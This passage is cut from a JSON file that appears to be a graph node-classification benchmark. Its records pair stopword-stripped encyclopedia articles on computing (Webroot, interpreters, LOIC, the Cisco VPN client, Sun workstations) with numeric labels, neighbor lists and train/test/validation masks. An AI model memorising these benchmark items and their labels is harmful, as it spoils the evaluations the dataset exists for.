inc. announced entered definitive agreement acquire webroot march 26 2019 carbonite closed acquisition webroot purchase price 618.5 million cash november 2007 webroot acquired uk-based email systems ems announced provider security software-as-a-service saas market december 2009 webroot announced partnership virtual private network software provider anchorfree version without advertisements anchorfree vpn software protection via webroot antivirus antispyware software produced march 2010 webroot announced acquisition swedish corporate internet security company email systems scandinavia ess july 2010 webroot acquired san diego california-based web content classification security services provider brightcloud adding web reputation content classification technology existing products november 2010 webroot acquired uk cloud-based anti-malware company prevx july 2011 partnership struck global distribution firm tech data making webroot products available tech data network 125,000 channel partners 100 countries around world july 2013 webroot rsa security formed partnership enhance firms real-time phishing detection september 2016 webroot acquired assets cyberflow analytics company applying data science network anomaly detection february 2019 webroot announced acquired carbonite march 2019 carbonite confirmed purchase av-comparatives gave nine vendors including webroot highest award july 2012 anti-phishing test webroot took 9th place among 18 products tested efficacy blocking phishing websites av-comparatives performance test october 2012 webroot best pcmark score lightest impact 20 products tested windows 7 64-bit machine webroot worst results 20 products tested av-comparatives september 2012 file detection test malicious software terms malware detection rates false alarms webroot detected less 80 percent viral samples much worse 94.4 percent rate second-lowest detecting product webroot inappropriately flagged 210 clean files raising many false positives 19 products tested combined according av-comparatives results misses confirmed several tests also vendor pc magazine awarded webroot secureanywhere 19 times editor choice security product year highest award given security software programs pc magazine test 2013 webroot found pc magazine staff best score malware blocking tests malware removal tests speed scans installation speed 2014 test pcmag found webroot detection rate 89 percent overall malware cleanup score 6.6 points tops among products tested using malware collection gartner listed webroot visionary quadrant 2014 assessment endpoint protection platforms 2014 passmark software software hardware performance benchmarking company benchmarked webroot secureanywhere business endpoint protection webroot secureanywhere antivirus using 13 performance metrics tests webroot products found outperform competitors variety metrics including scan times cpu usage others earning highest overall score tests november 2016 evaluation mobile security products android av-test given webroot secureanywhere mobile product protection score 3.5 6 placing near bottom 26 products evaluated test terms protection malware detection latest android malware real-time detection latest android malware discovered last 4 weeks scores industry average score october 2017 av-comparatives performed head-to-head comparison products vipre webroot webroot secureanywhere product able achieve 86.4 protection rate compared vipre cloud 100 rate test performed using test set 316 live malicious urls found field january 2018 test 84 various android antimalware apps av-comparatives webroot security premier detected 99.7 antimalware samples placing 30 tested apps showed better detection rates",
    "neighbors": [
      10496,
      2049,
      4994,
      131,
      5891,
      7809,
      1417,
      8703,
      3981,
      10637,
      3732,
      8724,
      4374,
      4247,
      1052,
      156,
      6431,
      5536,
      2721,
      5924,
      2213,
      550,
      423,
      1318,
      2601,
      6823,
      2859,
      3243,
      6699,
      8493,
      8614,
      8615,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      9791,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      2257,
      467,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      3807,
      9055,
      9569,
      8932,
      11622,
      2154,
      6382,
      4464,
      3955,
      6643,
      5749,
      10872,
      9341,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 9714,
    "label": 9,
    "text": "Interpreter_(computing):interpreter computing computer science interpreter computer program directly executes instructions written programming scripting language without requiring previously compiled machine language program interpreter generally uses one following strategies program execution early versions lisp programming language dartmouth basic would examples first type perl python matlab ruby examples second ucsd pascal example third type source programs compiled ahead time stored machine independent code linked run-time executed interpreter and/or compiler jit systems systems smalltalk contemporary versions basic java may also combine two three interpreters various types also constructed many languages traditionally associated compilation algol fortran cobol c/c++ interpretation compilation two main means programming languages implemented mutually exclusive interpreting systems also perform translation work like compilers terms interpreted language compiled language signify canonical implementation language interpreter compiler respectively high level language ideally abstraction independent particular implementations interpreters used early 1952 ease programming within limitations computers time e.g shortage program storage space native support floating point numbers interpreters also used translate low-level machine languages allowing code written machines still construction tested computers already existed first interpreted high-level language lisp lisp first implemented 1958 steve russell ibm 704 computer russell read john mccarthy paper realized mccarthy surprise lisp eval function could implemented machine code result working lisp interpreter could used run lisp programs properly evaluate lisp expressions programs written high level language either directly executed kind interpreter converted machine code compiler assembler linker cpu execute compilers assemblers generally produce machine code directly executable computer hardware often optionally produce intermediate form called object code basically machine specific code augmented symbol table names tags make executable blocks modules identifiable relocatable compiled programs typically use building blocks functions kept library object code modules linker used combine pre-made library files object file application form single executable file object files used generate executable file thus often produced different times sometimes even different languages capable generating object format simple interpreter written low level language e.g assembly may similar machine code blocks implementing functions high level language stored executed function entry look table points code however interpreter written high level language typically uses another approach generating walking parse tree generating executing intermediate software-defined instructions thus compilers interpreters generally turn source code text files tokens may may generate parse tree may generate immediate instructions stack machine quadruple code means basic difference compiler system including built separate linker generates stand-alone machine code program interpreter system instead performs actions described high level program compiler thus make almost conversions source code semantics machine level i.e program changed interpreter conversion work every time statement function executed however efficient interpreter much translation work including analysis types similar factored done first time program module function even statement run thus quite akin compiler works however compiled program still runs much faster circumstances part compilers designed optimize code may given ample time especially true simpler high level languages without many dynamic data structures checks type-checks traditional compilation executable output linkers .exe files .dll files library see picture typically relocatable run general operating system much like object code modules difference relocation done dynamically run time i.e program loaded execution hand compiled linked programs small embedded systems typically statically allocated often hard coded flash memory often secondary storage operating system sense historically interpreter-systems self-contained editor built becoming common also compilers often called ide although programmers prefer use editor choice run compiler linker tools manually historically compilers predate interpreters hardware time could support interpreter interpreted code typical batch environment time limited advantages interpretation software development cycle programmers make frequent changes source code using compiler time change made source code must wait compiler translate altered source files link binary code files together program executed larger program longer wait contrast programmer using interpreter lot less waiting interpreter usually needs translate code worked intermediate representation translate thus requiring much less time changes tested effects evident upon saving source code reloading program compiled code generally less readily debugged editing compiling linking sequential processes conducted proper sequence proper set commands reason many compilers also executive aid known make file program make file lists compiler linker command lines program source code files might take simple command line menu input e.g make 3 selects third group set instructions issues commands compiler linker feeding specified source code files compiler converts source code binary instruction specific processor architecture thus making less portable conversion made developer environment binary distributed user machines executed without translation cross compiler generate binary code user machine even different processor machine code compiled interpreted program distributed source code needs translated final machine takes time makes program distribution independent machine architecture however portability interpreted source code dependent target machine actually suitable interpreter interpreter needs supplied along source overall installation process complex delivery monolithic executable since interpreter part need installed fact interpreted code easily read copied humans concern point view copyright however various systems encryption obfuscation exist delivery intermediate code bytecode similar effect obfuscation bytecode could decoded decompiler disassembler main disadvantage interpreters interpreted program typically runs slower compiled difference speeds could tiny great often order magnitude sometimes generally takes longer run program interpreter run compiled code take less time interpret total time required compile run especially important prototyping testing code edit-interpret-debug cycle often much shorter edit-compile-run-debug cycle interpreting code slower running compiled code interpreter must analyze statement program time executed perform desired action whereas compiled code performs action within fixed context determined compilation run-time analysis known interpretive overhead access variables also slower interpreter mapping identifiers storage locations must done repeatedly run-time rather compile time various compromises development speed using interpreter execution speed using compiler systems lisps allow interpreted compiled code call share variables means routine tested debugged interpreter compiled thus benefit faster execution routines developed many interpreters execute source code stands convert compact internal form many basic interpreters replace keywords single byte tokens used find instruction jump table interpreters pbasic interpreter achieve even higher levels program compaction using bit-oriented rather byte-oriented program memory structure commands tokens occupy perhaps 5 bits nominally 16-bit constants stored variable-length code requiring 3 6 10 18 bits address operands include bit offset many basic interpreters store read back tokenized internal representation interpreter might well use lexical analyzer parser compiler interpret resulting abstract syntax tree example data type definitions latter toy interpreter syntax trees obtained c expressions shown box interpretation used sole method execution even though interpreter interpreted directly executed program needed somewhere bottom stack code interpreted definition machine code cpu execute spectrum possibilities interpreting compiling depending amount analysis performed program executed example emacs lisp compiled bytecode highly compressed optimized representation lisp source machine code therefore tied particular hardware compiled code interpreted bytecode interpreter written c compiled code case machine code virtual machine implemented hardware bytecode interpreter compiling interpreters sometimes also called compreters bytecode interpreter instruction starts byte therefore bytecode interpreters 256 instructions although may used bytecodes may take multiple bytes may arbitrarily complicated control tables necessarily ever need pass compiling phase dictate appropriate algorithmic control flow via customized interpreters similar fashion bytecode interpreters threaded code interpreters similar bytecode interpreters instead bytes use pointers instruction word points function instruction sequence possibly followed parameter threaded code interpreter either loops fetching instructions calling functions point fetches first instruction jumps every instruction sequence ends fetch jump next instruction unlike bytecode effective limit number different instructions available memory address space classic example threaded code forth code used open firmware systems source language compiled f code bytecode interpreted virtual machine spectrum interpreting compiling another approach transform source code optimized abstract syntax tree ast execute program following tree structure use generate native code just-in-time approach sentence needs parsed advantage bytecode ast keeps global program structure relations statements lost bytecode representation compressed provides compact representation thus using ast proposed better intermediate format just-in-time compilers bytecode also allows system perform better analysis runtime however interpreters ast causes overhead bytecode interpreter nodes related syntax performing useful work less sequential representation requiring traversal pointers overhead visiting tree blurring distinction interpreters bytecode interpreters compilation just-in-time compilation jit technique intermediate representation compiled native machine code runtime confers efficiency running native code cost startup time increased memory use bytecode ast first compiled adaptive optimization complementary technique interpreter profiles running program compiles frequently executed parts native code techniques decades old appearing languages smalltalk 1980s just-in-time compilation gained mainstream attention amongst language implementers recent years java .net framework modern javascript implementations matlab including jits self-interpreter programming language interpreter written programming language interpret example basic interpreter written basic self-interpreters related self-hosting compilers compiler exists language interpreted creating self-interpreter requires implementation language host language may another programming language assembler first interpreter system bootstrapped new versions interpreter developed language way donald knuth developed tangle interpreter language web industrial standard tex typesetting system defining computer language usually done relation abstract machine so-called operational semantics mathematical function denotational semantics language may also defined interpreter semantics host language given definition language self-interpreter well-founded define language self-interpreter tells reader expressiveness elegance language also enables interpreter interpret source code first step towards reflective interpreting important design dimension implementation self-interpreter whether feature interpreted language implemented feature interpreter host language example whether closure lisp-like language implemented using closures interpreter language implemented manually data structure explicitly storing environment features implemented feature host language less control programmer interpreter different behavior dealing number overflows realized arithmetic operations delegated corresponding operations host language languages elegant self-interpreter lisp prolog much research self-interpreters particularly reflective interpreters conducted scheme programming language dialect lisp general however turing-complete language allows writing interpreter lisp language lisp programs lists symbols lists xslt language xslt programs written xml sub-domain meta-programming writing domain-specific languages dsls clive gifford introduced measure quality self-interpreter eigenratio limit ratio computer time spent running stack n self-interpreters time spent run stack self-interpreters n goes infinity value depend program run book structure interpretation computer programs presents examples meta-circular interpretation scheme dialects examples languages self-interpreter forth pascal microcode commonly used technique imposes interpreter hardware architectural level computer microcode layer hardware-level instructions implement higher-level machine code instructions internal state machine sequencing many digital processing elements microcode used general-purpose central processing units well specialized processors microcontrollers digital signal processors channel controllers disk controllers network interface controllers network processors graphics processing units hardware microcode typically resides special high-speed memory translates machine instructions state machine data input sequences detailed circuit-level operations separates machine instructions underlying electronics instructions designed altered freely also facilitates building complex multi-step instructions reducing complexity computer circuits writing microcode often called microprogramming microcode particular processor implementation sometimes called microprogram extensive microcoding allows small simple microarchitectures emulate powerful architectures wider word length execution units relatively simple way achieve software compatibility different products processor family",
    "neighbors": [
      10752,
      5634,
      5635,
      7173,
      9733,
      6664,
      9224,
      7691,
      9739,
      9231,
      1552,
      4112,
      11287,
      3613,
      9245,
      5154,
      5160,
      3629,
      5677,
      3120,
      9780,
      2105,
      2620,
      6717,
      11326,
      4160,
      2626,
      8258,
      8262,
      5703,
      6228,
      8280,
      3675,
      7780,
      5733,
      4201,
      8301,
      3182,
      10352,
      3698,
      9330,
      119,
      1145,
      11385,
      5245,
      9345,
      3718,
      136,
      9865,
      5774,
      11411,
      3221,
      10909,
      7326,
      3233,
      9891,
      8868,
      9893,
      4777,
      4267,
      3244,
      5803,
      3249,
      692,
      6142,
      6143,
      7355,
      4799,
      9926,
      1735,
      10953,
      9932,
      11474,
      4823,
      9432,
      217,
      731,
      11487,
      6369,
      8421,
      7398,
      10470,
      2281,
      5354,
      8429,
      2798,
      5358,
      1776,
      5872,
      7919,
      8430,
      2804,
      9454,
      2294,
      2808,
      5880,
      5373,
      7421,
      9981,
      5892,
      6406,
      6919,
      3336,
      1801,
      1805,
      8973,
      786,
      5395,
      7444,
      5399,
      5404,
      10013,
      2335,
      8479,
      5409,
      3876,
      806,
      7462,
      7977,
      10537,
      814,
      4398,
      2352,
      1841,
      7983,
      8494,
      8503,
      3904,
      9034,
      8524,
      6477,
      339,
      2901,
      3413,
      1879,
      10584,
      11610,
      348,
      1890,
      2915,
      10083,
      8037,
      1894,
      6502,
      4968,
      5993,
      8554,
      9578,
      4972,
      11625,
      11632,
      9078,
      10616,
      5500,
      9599,
      6016,
      1409,
      3457,
      6020,
      3462,
      8582,
      7562,
      398,
      2964,
      6047,
      1952,
      7071,
      8609,
      10145,
      4516,
      7076,
      10658,
      937,
      939,
      10670,
      8627,
      1976,
      8122,
      10683,
      7612,
      10684,
      1470,
      5567,
      9152,
      8644,
      8646,
      1480,
      3529,
      7630,
      10703,
      9680,
      5585,
      11218,
      9688,
      10712,
      3034,
      11227,
      477,
      6112,
      3553,
      2533,
      4581,
      487,
      10729,
      3562,
      5612,
      9710,
      8179,
      3573,
      3577,
      2045,
      2558,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9715,
    "label": 4,
    "text": "Messaging_security:messaging security messaging security program provides protection companies messaging infrastructure programs includes ip reputation-based anti-spam pattern-based anti-spam administrator defined block/allow lists mail antivirus zero-hour malware detection email intrusion prevention",
    "neighbors": [
      9345,
      8998,
      4972,
      6262,
      8343,
      7515,
      4287
    ],
    "mask": "Test"
  },
  {
    "node_id": 9716,
    "label": 3,
    "text": "H.E.R.O.:h.e.r.o h.e.r.o standing helicopter emergency rescue operation video game written john van ryzin published activision atari 2600 march 1984 ported apple ii atari 5200 atari 8-bit family colecovision commodore 64 msx zx spectrum sega released version game sg-1000 console japan 1985 gameplay identical sega changed backpack helicopter jetpack player uses helicopter backpack tools rescue victims trapped deep mine mine made multiple screens using flip screen style player assumes control roderick hero sometimes styled r. hero one-man rescue team miners working mount leone trapped roderick reach player equipped backpack-mounted helicopter unit allows hover fly along helmet-mounted laser limited supply dynamite level consists maze mine shafts roderick must safely navigate order reach miner trapped bottom backpack limited amount power player must reach miner power supply exhausted mine shafts may blocked cave-ins magma require dynamite clear helmet laser also destroy cave-ins slowly dynamite unlike cave-in magma lethal touched later levels include walls magma openings alternate open closed requiring skillful navigation mine shafts populated spiders bats unknown creatures deadly touch creatures destroyed using laser dynamite deep mines flooded forcing players hover safely water later levels monsters strike water mine sections illuminated lanterns lantern somehow destroyed layout section becomes invisible exploding dynamite lights mine brief time points scored cave-in cleared creature destroyed player reaches miner points awarded rescue along amount power remaining backpack remaining stick dynamite extra lives awarded every 20,000 points scored review colecovision port electronic games wrote activision wisely used superior graphics cv units provide breathtaking underground panorama concluded congrats activision h.e.r.o real champion june 1987 issue zzap 64 julian rignall wrote—of c64 version— hero looks awful sounds terrible plays absolutely beautifully h.e.r.o included retrogaming compilation activision anthology 1985 analog computing published clone called r.o.t.o atari 8-bit family",
    "neighbors": [
      10931,
      9006,
      11311
    ],
    "mask": "Train"
  },
  {
    "node_id": 9717,
    "label": 5,
    "text": "X.21:x.21 x.21 sometimes referred x21 interface specification differential communications introduced mid-1970s itu-t. x.21 first introduced means provide digital signaling interface telecommunications carriers customers equipment includes specifications dte/dce physical interface elements alignment call control characters error checking elements call control phase circuit switching services test loops x.21 used v.11 provides synchronous data transmission rates 600 bit/s 10 mbit/s also variant x.21 used select legacy applications “ circuit switched x.21 ” x.21 normally found 15-pin d-sub connector capable running full-duplex data transmissions signal element timing clock provided carrier telephone company responsible correct clocking data x.21 primarily used europe japan example scandinavian datex german datex-l circuit switched networks 1980s article based x.21 foldoc x.21 pinouts used",
    "neighbors": [
      2802
    ],
    "mask": "Test"
  },
  {
    "node_id": 9718,
    "label": 0,
    "text": "Dan_Roth:dan roth dan roth eduardo d. glandt distinguished professor computer information science university pennsylvania roth got b.a summa cum laude mathematics technion israel ph.d computer science harvard university 1995 taught university illinois urbana-champaign 1998 2017 moving university pennsylvania roth fellow american association advancement science aaas association computing machinery acm association advancement artificial intelligence aaai association computational linguistics acl roth ’ research focuses computational foundations intelligent behavior develops theories systems pertaining intelligent behavior using unified methodology heart idea learning central role intelligence work centers around study machine learning inference methods facilitate natural language understanding pursued several interrelated lines work span multiple aspects problem fundamental questions learning inference interact study range natural language processing nlp problems developing advanced machine learning based tools natural language applications roth made seminal contribution fusion learning reasoning machine learning weak incidental supervision machine learning inference approaches natural language understanding roth worked probabilistic reasoning including complexity probabilistic lifted inference constrained conditional models ilp formulations nlp problems constraints-driven learning part-based constellation methods object recognition response based learning developed nlp information extraction tools used broadly researchers commercially including ner coreference resolution wikification srl esl text correction roth editor-in-chief journal artificial intelligence research jair",
    "neighbors": [
      1783,
      679
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9719,
    "label": 7,
    "text": "The_Business_Cloud:business cloud business cloud api enabled self-service platform developed domo provides array services like data connection data visualization domo inc. founded 2010 josh james also co-founded web analytics software company omniture 1996 took public 2006 domo launched domo appstore 1000 apps social mobile capabilities 2016 appstore creates network business apps ecosystem companies single integrated business cloud decision came domo announced 131 million round funding blackrock according company concept behind business cloud connect smaller clouds relating apps functional areas business single business cloud allows self-service social features customers business cloud offered free service claimed world first business cloud domo appstore one core services free package includes domo features functionality including domo platform domo apps visualizations alerts company directories org charts profiles tasks domo mobile business cloud allows customers leverage preferred cloud well on-premises software monitor aspects business routine company supported 500 million fund investors world",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9720,
    "label": 5,
    "text": "TCPware:tcpware tcpware third party layered product published process software llc add tcp/ip capabilities openvms need product may seem obvious today back early 1990s digital equipment corporation published vms known time internal policy favoring product called decnet meanwhile many vms users governments large corporations universities discovering tcp/ip based internet required third party software enable connectivity today hp tcpip services openvms putting pressure products like tcpware one reason tcpware faded use two tcpware apis called telnet library ftp library modules allow relatively inexperienced programmer use high level language write software connect across internet useful work also quite bit legacy software relies modules good reason rewite lower packet library level",
    "neighbors": [
      5384,
      9909
    ],
    "mask": "Test"
  },
  {
    "node_id": 9721,
    "label": 4,
    "text": "EMCO_Software:emco software emco software development company founded 2001 headquartered reykjavik iceland develops network management software used automation remote administration network audit remote software deployment network monitoring permissions audit power management tasks corporate networks addition commercial products company also offers set freeware utilities system management network administration emco provides commercial solutions freeware tools automation network administration tasks remote management windows computers company products implemented windows desktop applications graphical user interface designed installed servers administrator desktops used centralized network management staff working applications must administrative access network computers order manage remotely emco products rely microsoft network infrastructure perform remote management operations thus allowing management computers within local network remote management access computers via internet provided company offers multiple freeware tools utilities used automation several typical network management tasks system problems troubleshooting free network applications designed network administrators need collect information perform certain operations remote computers free system utilities used administration staff individual users resolve number problems personal computers company offers freeware commercial tools used monitor state network hosts devices company offers two types remote deployment solutions types allow installing uninstalling applications windows computers across local network use different deployment approaches functional differences",
    "neighbors": [
      7411,
      8692,
      4174
    ],
    "mask": "None"
  },
  {
    "node_id": 9722,
    "label": 4,
    "text": "Cisco_Systems_VPN_Client:cisco systems vpn client cisco systems vpn client software application connecting virtual private networks based internet key exchange version 1 july 29 2011 cisco announced end life product product updates released july 30 2012 support ceased july 29 2014 support page documentation links taken july 30 2016 replaced obsolete status notification software free often installed university business computers accordance site-license corporate licenses administrators allowed freely distribute software users within network open-source vpnc client connect vpns supported official client vpn client 4.9.01.0230 beta added support mac os x 10.6 stable version 4.9.01.0180 appears lack support 4.9.00.0050 explicitly support versions mac os x later 10.5 vpn client 5.0.07.0290 added support 64-bit versions windows vista windows 7 client uses profile configuration files .pcf store vpn passwords either hashed type 7 stored plaintext vulnerability identified passwords easily decoded using software online services work around issues network administrators advised use mutual group authentication feature use unique passwords n't related important network passwords",
    "neighbors": [
      10889,
      8211,
      11162,
      10908,
      3742,
      9764,
      4268,
      7983,
      10417,
      6834,
      7859,
      2228,
      823,
      3777,
      2884,
      5959,
      8265,
      11468,
      7376,
      11606,
      2136,
      9048,
      6490,
      6364,
      5084,
      10210,
      9318,
      8039,
      11248,
      5749,
      3322
    ],
    "mask": "None"
  },
  {
    "node_id": 9723,
    "label": 3,
    "text": "AlphaStation:alphastation alphastation name given series computer workstations produced 1994 onwards digital equipment corporation later compaq hp name suggests alphastations based dec alpha 64-bit microprocessor supported operating systems alphastations comprise tru64 unix formerly digital unix openvms windows nt alphabios arc firmware workstations also run various versions linux bsd operating systems alpha workstations produced dec include dec 2000 axp decpc axp 150 dec 3000 axp digital personal workstation -series au -series codename miata multia vx40/41/42 alpha xl/alpha xlt line member alcor family swappable daughterboard pentium processor transform dec celebris xl line xp900 onwards alphastation models simply workstation configurations corresponding alphaserver model",
    "neighbors": [
      5384,
      9742,
      8976,
      2452,
      10104,
      408,
      8474,
      8732,
      6942,
      799,
      7983,
      823,
      7234,
      3142,
      8390,
      6352,
      11604,
      3945,
      10220,
      5873,
      499,
      3445,
      5368
    ],
    "mask": "Test"
  },
  {
    "node_id": 9724,
    "label": 2,
    "text": "IBM_Software_Configuration_and_Library_Manager:ibm software configuration library manager ibm software configuration library manager sclm ibm software product component ispf first introduced version 3 ispf upgrade previous component called lmf library management facility introduced version 2 ispf component mvs os/390 z/os operating systems/platforms sclm consists two products library manager configuration manager provides following functions",
    "neighbors": [
      1668,
      909,
      7053,
      7983,
      7666,
      4919,
      2168,
      3323,
      2172
    ],
    "mask": "Test"
  },
  {
    "node_id": 9725,
    "label": 5,
    "text": "SIMPLE_(military_communications_protocol):simple military communications protocol standard interface multiple platform link evaluation simple military communications protocol defined nato standardization agreement stanag 5602 simple defines communications protocol provide means geographically national international separated tactical data link tdl equipment c4isr c2 non-c2 test facilities exchange environment data tdl messages order conduct detailed tdl interoperability io testing intended provide specifications common standard interconnect ground rigs types simulation integration facilities simple allows transmission m-series j-series messages ip-based protocols previously j-series messages could sent using link 16 protocol however link 16 radio protocol frequency range limits exchange information within line-of-sight use flexible bearer protocols ip makes easier exchange j-series data particularly simulations integration however simple limited use simulation integration finding applications beyond original purpose wherever transmission j-series data amenable radio protocols link 16 simple standard specifies distributed transfer simulated scenario/synthetic environment using ieee distributed interactive simulation dis protocols dis government/industry initiative define infrastructure linking simulations various types multiple locations create realistic complex virtual worlds simulation highly interactive activities new protocol data unit pdu definition dis pdu added baseline protocol support exchange dis pdus simulated entities content simple dis pdu packet related dis pdus defined ieee 1278.1 standard transmitter signal pdu fields require translation simple standard consists several elements simple application layer protocol designed independent transport layer run using following transport layer protocols simple method exchanging tdl messages take host generated message traffic mids/jtids terminal interface repackage transmission across simple network receiving simple node extracts tdl message traffic received packet presents host interface received mids/jtids terminal development simple resulted requirement february 1996 ad hoc working group ahwg nato common interoperability standards ncis testing single interface standard support interconnection nato resources",
    "neighbors": [
      2948,
      10924,
      6861,
      3629,
      10833,
      11413,
      10748,
      7388
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9726,
    "label": 2,
    "text": "XAML_Browser_Applications:xaml browser applications xaml browser applications xbap pronounced ex-bap windows presentation foundation .xbap applications hosted run inside web browser firefox internet explorer hosted applications run partial trust sandbox environment given full access computer resources like opening new network connection saving file computer disk wpf functionality available hosted environment intended protect computer malicious applications however also run full trust mode client changing permission starting xbap html page seamless security installation prompt although one perceives application running browser actually runs out-of-process executable presentationhost.exe managed virtual machine initial release .net framework 3.0 xbaps ran internet explorer release .net framework 3.5 sp1 includes xbap extension also run mozilla firefox xbap applications certain restrictions .net features use since run partial trust restricted set permission granted internetzone application nearly standard wpf functionality however around 99 available xbap application therefore wpf ui features available starting february 2009 xbap applications longer function run internet attempting run xbap cause browser present generic error message option exists internet explorer 9 used allow applications run must done care increases potential attack surface security vulnerabilities xbap",
    "neighbors": [
      10624,
      4231,
      1802,
      7947,
      10506,
      9229,
      11154,
      1556,
      3224,
      3997,
      4384,
      10020,
      11559,
      10026,
      2603,
      7212,
      10284,
      9263,
      4658,
      2485,
      1468,
      4797,
      1347,
      1348,
      8644,
      11466,
      5067,
      7629,
      3920,
      3921,
      5593,
      5849,
      7515,
      9434,
      6366,
      865,
      2145,
      7784,
      9834,
      4972,
      3821,
      8689,
      9841,
      3573,
      119,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 9727,
    "label": 4,
    "text": "Low_Orbit_Ion_Cannon:low orbit ion cannon low orbit ion cannon loic open-source network stress testing denial-of-service attack application written c loic initially developed praetox technologies later released public domain hosted several open source platforms loic performs dos attack used multiple individuals ddos attack target site flooding server tcp udp packets intention disrupting service particular host people used loic join voluntary botnets software inspired creation independent javascript version called js loic well loic-derived web version called low orbit web cannon enable dos web browser security experts quoted bbc indicated well-written firewall rules filter traffic ddos attacks loic thus preventing attacks fully effective least one instance filtering udp icmp traffic blocked loic attack internet service providers provide less bandwidth customers order provide guaranteed service levels customers firewall rules sort likely effective implemented point upstream application server internet uplink words easy cause isp drop traffic destined customer sending greater amount traffic allowed customer link filtration occurs customer side traffic traverses link stop service provider dropping excess traffic destined customer loic attacks easily identified system logs attack tracked ip addresses used loic used anonymous group spawned /b/ board 4chan project chanology attack websites church scientology successfully attack recording industry association america website october 2010 used anonymous operation payback december 2010 attack websites companies organizations opposed wikileaks retaliation shutdown file sharing service megaupload arrest four workers members anonymous launched ddos attack upon websites universal music group company responsible lawsuit megaupload united states department justice united states copyright office federal bureau investigation mpaa warner music group riaa well hadopi afternoon january 19 2012 loic general attack hoped retaliate anonymous members believed harmed digital freedoms loic application named ion cannon fictional weapon many sci-fi works video games particular namesake command conquer series downloading using loic personal servers means stress-testing perfectly legal least united states using program perform ddos attack someone else could considered felony computer fraud abuse act 1986 cfaa charge could land someone 20 years imprisonment fine",
    "neighbors": [
      3462,
      2060,
      6797,
      4883,
      11413,
      5402,
      4133,
      8998,
      939,
      10924,
      1965,
      7983,
      823,
      953,
      4027,
      7102,
      1088,
      2754,
      9282,
      6347,
      2508,
      4558,
      6735,
      11351,
      2018,
      10852,
      7526,
      2409,
      3573,
      3581,
      3711
    ],
    "mask": "None"
  },
  {
    "node_id": 9728,
    "label": 9,
    "text": "KiXtart:kixtart kixtart closed source free-format scripting language windows described logon script processor enhanced batch scripting language official website name portmanteau kick start kixtart developed ruud van velsen microsoft netherlands provided careware development started 1991 provide login scripting microsoft lan manager environment rich built-in functionality easy scripting provides access adsi ado wmi etc language used display information set environment variables start programs connect network drives read edit registry change current drive directory much kixforms user create gui kixtart read windows product id development kixtart logon scripting language started 1991 later versions released dates kixtart 2001 kixtart 2010",
    "neighbors": [
      4771,
      5287,
      2183,
      8588,
      6797,
      7343,
      5968,
      7983,
      9780,
      5622,
      9276
    ],
    "mask": "None"
  },
  {
    "node_id": 9729,
    "label": 1,
    "text": "SQLObject:sqlobject sqlobject python object-relational mapper sql database python objects experiencing community popularity forms part many applications e.g. turbogears similar ruby rails activerecord operation uses class definitions form table schemas utilizes language reflection dynamism useful sqlobject supports number common database backends included distribution mysql postgresql sqlite sybase sql server maxdb microsoft sql server firebird first version sqlobject publicly released october 2002",
    "neighbors": [
      3080,
      5546,
      8554,
      5612,
      9389,
      5806,
      7022,
      7983,
      9467,
      10250,
      3763,
      10413,
      2901,
      11030,
      11338,
      8539
    ],
    "mask": "None"
  },
  {
    "node_id": 9730,
    "label": 9,
    "text": "SISC:sisc sisc r5rs scheme implementation includes full number tower hygienic macros proper tail recursion first class continuations sisc short second interpreter scheme code reference predecessor lisc lightweight interpreter scheme code sisc free software dual-licensed mozilla public license gnu general public license version 2 developed scott g. miller matthias radestock sisc depends sun microsystems java programming language platform runtime environment allows sisc provide many extensions libraries networking exception handling module system java foreign function interface sisc website claims performs faster scheme interpreter based java virtual machine jvm like gnu guile scheme suitable embedding larger programs guile designed inclusion c programs sisc designed jvm",
    "neighbors": [
      9665,
      10083,
      8262,
      5612,
      5677,
      7983,
      2804,
      2585,
      10012,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9731,
    "label": 3,
    "text": "Sun_Ultra_series:sun ultra series sun ultra series discontinued line workstation server computers developed sold sun microsystems comprising two distinct generations original line introduced 1995 discontinued 2001 generation partially replaced sun blade 2000 line replaced sun java workstation—an amd opteron system—in 2004 sync transition x86-64-architecture processors 2005 ultra brand later revived launch ultra 20 ultra 40 albeit confusion since longer based ultrasparc processors original ultra workstations ultra enterprise later sun enterprise servers ultrasparc-based systems produced 1995 2001 replacing earlier sparcstation sparccenter/sparcserver series respectively introduced 64-bit ultrasparc processor later versions lower-cost pc-derived technology pci ata buses initial ultra 1 2 models retained sbus predecessors original ultra range sold dot com boom became one biggest selling series computers ever developed sun microsystems many companies organisations—including sun itself—relying sun ultra products years successor products released ultra brand revived 2005 launch ultra 20 ultra 40 x86-64-architecture x64-based ultra systems remained sun portfolio five years last one intel xeon-based ultra 27 retired june 2010 thereby concluding history sun workstation vendor sparc-based ultra 3 mobile workstation laptop released 2005 well would prove short-lived design retired next year release coincide rest line brand already moved x86 additionally new ultra 25 ultra 45 desktop ultrasparc iiii-based systems introduced 2006 october 2008 sun discontinued effectively ending production sparc architecture workstations original ultra/enterprise series later replaced sun blade workstation sun fire server ranges note enterprise 220r ultra 60 motherboard rack-mountable server chassis hot-swappable power supplies similarly enterprise 420r ultra 80 motherboard server chassis intervening time gap sun workstations named sun blade sun java workstation a60 ultra-3 rebadged tadpole sparcle 550 650 mhz viper 1.2 ghz laptops a61 ultra-3 physically different based naturetech 888p 550/650 mhz mesostation 999 1.28 ghz two lines unrelated systems otherwise",
    "neighbors": [
      3328,
      9090,
      1801,
      4235,
      1809,
      4241,
      2710,
      26,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      3247,
      6322,
      2995,
      2871,
      4664,
      4285,
      6464,
      7104,
      6338,
      9665,
      10436,
      3911,
      1480,
      8007,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      11626,
      5356,
      7148,
      7022,
      5872,
      5233,
      8179,
      11636,
      9333,
      631,
      11129,
      1788,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 9732,
    "label": 2,
